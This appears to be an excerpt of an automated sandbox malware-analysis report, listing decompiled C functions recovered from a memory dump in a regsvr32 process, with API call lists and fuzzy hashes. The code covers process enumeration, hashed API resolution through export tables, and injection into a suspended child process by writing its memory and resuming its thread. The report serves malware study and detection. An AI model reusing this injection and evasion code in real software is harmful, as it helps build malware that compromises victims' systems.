                                                                                                                                                                        						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                        						FindCloseChangeNotification(_t45);
                                                                                                                                                                        						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t30 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t30 + 0x30))(_t45);
                                                                                                                                                                        						_t17 = 0xfffffffe;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t17;
                                                                                                                                                                        			}













                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0536B988
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 0536B9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 0536B9EB
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0536B9F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2518216231-0
                                                                                                                                                                        • Opcode ID: 6764bd79e27369c7aaac650cfbc271fb4f6244837c1ae776d4435dc63b744110
                                                                                                                                                                        • Instruction ID: 4a06082b559647b3c16d738836fcf21e9b90aa66977fe973341b07fb6a40ced3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6764bd79e27369c7aaac650cfbc271fb4f6244837c1ae776d4435dc63b744110
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A1186726043056BC320EF68E84AE9B7BECFF85360F144A6DF561CB180EB20D5458BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 191 536eebb-536eed2 192 536eed4-536eefc 191->192 193 536ef2f 191->193 192->193 195 536eefe-536ef21 call 536a43d call 536e2c5 192->195 194 536ef31-536ef35 193->194 200 536ef36-536ef4d 195->200 201 536ef23-536ef2d 195->201 202 536efa3-536efa5 200->202 203 536ef4f-536ef57 200->203 201->193 201->195 202->194 203->202 204 536ef59 203->204 205 536ef5b-536ef61 204->205 206 536ef63-536ef65 205->206 207 536ef71-536ef82 205->207 206->207 208 536ef67-536ef6f 206->208 209 536ef87-536ef93 LoadLibraryA 207->209 210 536ef84-536ef85 207->210 208->205 208->207 209->193 211 536ef95-536ef9f GetProcAddress 209->211 210->209 211->193 212 536efa1 211->212 212->194
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536EEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				struct HINSTANCE__* _t58;
                                                                                                                                                                        				_Unknown_base(*)()* _t59;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				void* _t69;
                                                                                                                                                                        				char _t70;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				CHAR* _t80;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        
                                                                                                                                                                        				_t75 = __ecx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                        				if(_t41 == 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t62 = _t41 + __ecx;
                                                                                                                                                                        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                        				_t47 = 0;
                                                                                                                                                                        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v16 = _t63;
                                                                                                                                                                        				if(_t63 == 0) {
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L2;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t49 = E0536E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0536A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                        					_t51 = _v8;
                                                                                                                                                                        					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t73 = _v20;
                                                                                                                                                                        					_t47 = _t51 + 1;
                                                                                                                                                                        					_v8 = _t47;
                                                                                                                                                                        					if(_t47 < _v16) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                        					return _t80;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t56 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t70 = _t80[_t56];
                                                                                                                                                                        						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                        						_t56 = _t56 + 1;
                                                                                                                                                                        						if(_t56 < 0x40) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                        					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                        						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                        					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                        					if(_t58 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                        					if(_t59 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t59;
                                                                                                                                                                        				}
                                                                                                                                                                        			}


























                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0536EF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0536EF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: 681fc1b796ac05a545f4d6f62a645a986cb46490afbc6e10f41d90ff1ad7ea5e
                                                                                                                                                                        • Instruction ID: 5d5d705cec49fc0faf25048e460b792f0da08705dc3f71aa9ec3c581fd143414
                                                                                                                                                                        • Opcode Fuzzy Hash: 681fc1b796ac05a545f4d6f62a645a986cb46490afbc6e10f41d90ff1ad7ea5e
                                                                                                                                                                        • Instruction Fuzzy Hash: D931D639A141169FCB24CFADC4846AFBBF9BF44304F25846DD805EB344DB70D94597A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 213 536c7f5-536c815 GetTokenInformation 214 536c817-536c820 GetLastError 213->214 215 536c85b 213->215 214->215 216 536c822-536c832 call 5368bde 214->216 217 536c85d-536c861 215->217 220 536c834-536c836 216->220 221 536c838-536c84b GetTokenInformation 216->221 220->217 221->215 222 536c84d-536c859 call 5368bf4 221->222 222->220
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E0536C7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                        				_t28 = __edx;
                                                                                                                                                                        				_t20 = _t22;
                                                                                                                                                                        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                        					L6:
                                                                                                                                                                        					_t12 = _t31;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t31 = E05368BDE(_v8);
                                                                                                                                                                        					_v12 = _t31;
                                                                                                                                                                        					if(_t31 != 0) {
                                                                                                                                                                        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                        							goto L6;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							E05368BF4( &_v12, _t16);
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t12;
                                                                                                                                                                        			}


                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,05360000,00000000,00000000,?,0536C876,00000000,00000000,?,0536C89F), ref: 0536C810
                                                                                                                                                                        • GetLastError.KERNEL32(?,0536C876,00000000,00000000,?,0536C89F,00001644,?,0536DFCE), ref: 0536C817
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0536C876,00000000,00000000,?,0536C89F,00001644,?,0536DFCE), ref: 0536C846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: aa75e85708d29e27d100307026e3cc1d963178f133cc77492ad1b22f8f047b61
                                                                                                                                                                        • Instruction ID: 4cefb5c1eb022a4341c0212fb86a86d9f706388b6478944ab1f3bb722b535680
                                                                                                                                                                        • Opcode Fuzzy Hash: aa75e85708d29e27d100307026e3cc1d963178f133cc77492ad1b22f8f047b61
                                                                                                                                                                        • Instruction Fuzzy Hash: 0101A772A0011CBF8B319BA5DC49DAB7FEDFE496A0B10556DF509D6115D670DD00C7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 225 536bc84-536bcd3 call 5368d6d * 2 CreateProcessW
                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E0536BC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                        				struct _STARTUPINFOW _v72;
                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                        
                                                                                                                                                                        				E05368D6D(__edx, 0, 0x10);
                                                                                                                                                                        				E05368D6D( &_v72, 0, 0x44);
                                                                                                                                                                        				_v72.cb = 0x44;
                                                                                                                                                                        				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~( ~_t11) - 1;
                                                                                                                                                                        			}






                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0536BCC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateProcessmemset
                                                                                                                                                                        • String ID: D
                                                                                                                                                                        • API String ID: 2296119082-2746444292
                                                                                                                                                                        • Opcode ID: 1ef2a2c88e4b3bd596cb7fbc7abf75bb0991130c1b0aca7dff8d5104a926613a
                                                                                                                                                                        • Instruction ID: 6223b880c7a4492ea1989ac386d2c5cef4682c16a390d3e23a871fd313b78229
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ef2a2c88e4b3bd596cb7fbc7abf75bb0991130c1b0aca7dff8d5104a926613a
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F030F16402087EF720EA659C0AFBF7AACDB45710F504129BA05EB1C0EAA0AD4582B5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 230 536d804-536d824 call 536d6dc 233 536d955-536d958 230->233 234 536d82a-536d849 call 536b557 230->234 237 536d945-536d954 call 5368bf4 234->237 238 536d84f-536d851 234->238 237->233 239 536d857-536d859 238->239 240 536d933-536d943 call 5368bf4 238->240 242 536d85c-536d85e 239->242 240->237 245 536d864-536d883 call 5368d6d call 536bc84 242->245 246 536d921-536d92d 242->246 252 536d8e5-536d8e9 245->252 253 536d885-536d898 call 536d959 245->253 246->238 246->240 254 536d914-536d91b 252->254 255 536d8eb-536d8ed 252->255 253->252 260 536d89a-536d8b2 253->260 254->242 254->246 257 536d8fe-536d90e 255->257 258 536d8ef-536d8f5 255->258 257->254 258->257 263 536d8b4-536d8c9 GetLastError call 536da57 260->263 264 536d8e2 260->264 267 536d8de-536d8df FindCloseChangeNotification 263->267 268 536d8cb-536d8d6 263->268 264->252 267->264 270 536d8d8 268->270 271 536d8d9 268->271 270->271 271->267
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E0536D804(intOrPtr __edx) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                        				char _v40;
                                                                                                                                                                        				char _v80;
                                                                                                                                                                        				char _t37;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				intOrPtr _t86;
                                                                                                                                                                        				char _t87;
                                                                                                                                                                        				void* _t88;
                                                                                                                                                                        
                                                                                                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                                                                                                        				_v20 = __edx;
                                                                                                                                                                        				_t86 = 0;
                                                                                                                                                                        				_t37 = E0536D6DC( &_v16);
                                                                                                                                                                        				_t87 = _t37;
                                                                                                                                                                        				_v24 = _t87;
                                                                                                                                                                        				_t89 = _t87;
                                                                                                                                                                        				if(_t87 == 0) {
                                                                                                                                                                        					return _t37;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t38 =  *0x537f81c; // 0x546fbe8
                                                                                                                                                                        				_t7 = _t38 + 0xac; // 0x7fc38876
                                                                                                                                                                        				E0536B557( &_v80,  *_t7 + 7, _t89);
                                                                                                                                                                        				_v12 = _v12 & 0;
                                                                                                                                                                        				_t67 = _v16;
                                                                                                                                                                        				if(_t67 == 0) {
                                                                                                                                                                        					L21:
                                                                                                                                                                        					E05368BF4( &_v24, 0);
                                                                                                                                                                        					return _t86;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_t86 == 0) {
                                                                                                                                                                        					_t69 = 0;
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					while(_t86 == 0) {
                                                                                                                                                                        						E05368D6D( &_v40, _t86, 0x10);
                                                                                                                                                                        						_t88 = _t88 + 0xc;
                                                                                                                                                                        						_t49 = E0536BC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
                                                                                                                                                                        						_t94 = _t49;
                                                                                                                                                                        						if(_t49 >= 0) {
                                                                                                                                                                        							_t56 = E0536D959(E053661C5,  &_v40, _t94, _v20); // executed
                                                                                                                                                                        							if(_t56 != 0) {
                                                                                                                                                                        								_t59 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
                                                                                                                                                                        								if(_t70 != 0) {
                                                                                                                                                                        									GetLastError();
                                                                                                                                                                        									_t62 = E0536DA57( &_v40);
                                                                                                                                                                        									_t63 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        									if(_t62 != 0) {
                                                                                                                                                                        										_push(0xea60);
                                                                                                                                                                        										_push(_t70);
                                                                                                                                                                        										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
                                                                                                                                                                        											_t86 = _t86 + 1;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t63 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        									}
                                                                                                                                                                        									FindCloseChangeNotification(_t70);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t69 = _v8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v40 != 0) {
                                                                                                                                                                        							if(_t86 == 0) {
                                                                                                                                                                        								_t54 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t50 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t50 + 0x30))(_v36);
                                                                                                                                                                        							_t52 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t52 + 0x30))(_v40);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t69 = _t69 + 1;
                                                                                                                                                                        						_v8 = _t69;
                                                                                                                                                                        						if(_t69 < 2) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t67 = _v16;
                                                                                                                                                                        					_t45 = _v12 + 1;
                                                                                                                                                                        					_v12 = _t45;
                                                                                                                                                                        					if(_t45 < _t67) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					do {
                                                                                                                                                                        						goto L20;
                                                                                                                                                                        					} while (_t67 != 0);
                                                                                                                                                                        					goto L21;
                                                                                                                                                                        				}
                                                                                                                                                                        				L20:
                                                                                                                                                                        				E05368BF4(_t87, 0xfffffffe);
                                                                                                                                                                        				_t87 = _t87 + 4;
                                                                                                                                                                        				_t67 = _t67 - 1;
                                                                                                                                                                        			}





























                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368D6D: memset.MSVCRT ref: 05368D7F
                                                                                                                                                                          • Part of subcall function 0536BC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0536BCC6
                                                                                                                                                                          • Part of subcall function 0536D959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0536D9BB
                                                                                                                                                                          • Part of subcall function 0536D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0536DA04
                                                                                                                                                                          • Part of subcall function 0536D959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0536DA21
                                                                                                                                                                          • Part of subcall function 0536D959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0536DA42
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 0536D8B4
                                                                                                                                                                          • Part of subcall function 0536DA57: ResumeThread.KERNELBASE(?,0536D8C2,?,?,00000001), ref: 0536DA5F
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0536D8DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2212882986-0
                                                                                                                                                                        • Opcode ID: 0cebede1d8fa62d3768291b1b1267fa6d0d5b70037270831af7ff50ea6873f6b
                                                                                                                                                                        • Instruction ID: b62e2415f4f859450646d5e79652c48b8011dabed605448a953a476ea6795325
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cebede1d8fa62d3768291b1b1267fa6d0d5b70037270831af7ff50ea6873f6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 2C416D72B10209AFCB11DFA5D989EADBBF9FF48310F10846DE506E7259DB709A418B60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				intOrPtr _t15;
                                                                                                                                                                        				WCHAR* _t23;
                                                                                                                                                                        				long _t24;
                                                                                                                                                                        				void* _t28;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        				intOrPtr _t36;
                                                                                                                                                                        				void* _t41;
                                                                                                                                                                        				void* _t48;
                                                                                                                                                                        				intOrPtr* _t49;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				if(_a8 != 1) {
                                                                                                                                                                        					__eflags = _a8;
                                                                                                                                                                        					if(_a8 != 0) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                        						return 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t15 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				E05368BC9();
                                                                                                                                                                        				E05369591();
                                                                                                                                                                        				 *0x537f830 = _a4;
                                                                                                                                                                        				E05373CD5(_a4);
                                                                                                                                                                        				 *_t49 = 0xf43;
                                                                                                                                                                        				 *0x537f818 = E0536F05C(0x537ca50, 0x138);
                                                                                                                                                                        				 *_t49 = 0x111;
                                                                                                                                                                        				_t23 = E05369DF2(0x537ca50);
                                                                                                                                                                        				_pop(_t41);
                                                                                                                                                                        				_a8 = _t23;
                                                                                                                                                                        				_t24 = GetFileAttributesW(_t23); // executed
                                                                                                                                                                        				_push( &_a8);
                                                                                                                                                                        				if(_t24 == 0xffffffff) {
                                                                                                                                                                        					E05368BAF();
                                                                                                                                                                        					 *_t49 = 0x40e;
                                                                                                                                                                        					_t28 = E05369CB5(E0536109A(_t41));
                                                                                                                                                                        					_a8 = _t28;
                                                                                                                                                                        					__eflags = _t28;
                                                                                                                                                                        					if(_t28 != 0) {
                                                                                                                                                                        						_t48 = 0x54;
                                                                                                                                                                        						 *0x537f828 = E0536F05C(0x537cbb8, _t48);
                                                                                                                                                                        						E05366370(_t48, __eflags);
                                                                                                                                                                        						E05368BF4( &_a8, 0xfffffffe);
                                                                                                                                                                        						_t36 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                        					_t31 = CreateThread(0, 0, E05366298, 0, 0,  &_v8);
                                                                                                                                                                        					 *0x537f83c = _t31;
                                                                                                                                                                        					__eflags = _t31;
                                                                                                                                                                        					if(_t31 == 0) {
                                                                                                                                                                        						goto L3;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L7;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E05368BAF();
                                                                                                                                                                        				goto L3;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 05368BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,05366502), ref: 05368BD2
                                                                                                                                                                          • Part of subcall function 0536F05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,0537CA50,?,0536652B,?), ref: 0536F07E
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 05366541
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,05366298,00000000,00000000,?), ref: 053665C8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 607385197-0
                                                                                                                                                                        • Opcode ID: b7c9130599aae25071714cf571934ab03a0dc6ce584ae39351a8b66a637436b2
                                                                                                                                                                        • Instruction ID: e91b5a0308e9d31b58c52716542dc86483a45aa24da1da7f8ed09025abe72427
                                                                                                                                                                        • Opcode Fuzzy Hash: b7c9130599aae25071714cf571934ab03a0dc6ce584ae39351a8b66a637436b2
                                                                                                                                                                        • Instruction Fuzzy Hash: AF213DB1A14208ABDB14BF74D84BAA93BE8AB04350F10C52DF619CA188DFB4D5818B65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 308 536f05c-536f07c call 5369dd8 311 536f086-536f08b LoadLibraryA 308->311 312 536f07e-536f084 GetModuleHandleA 308->312 313 536f08d-536f08f 311->313 312->313 314 536f091-536f096 call 536f011 313->314 315 536f09e-536f0ac call 5368b9c 313->315 318 536f09b-536f09c 314->318 318->315
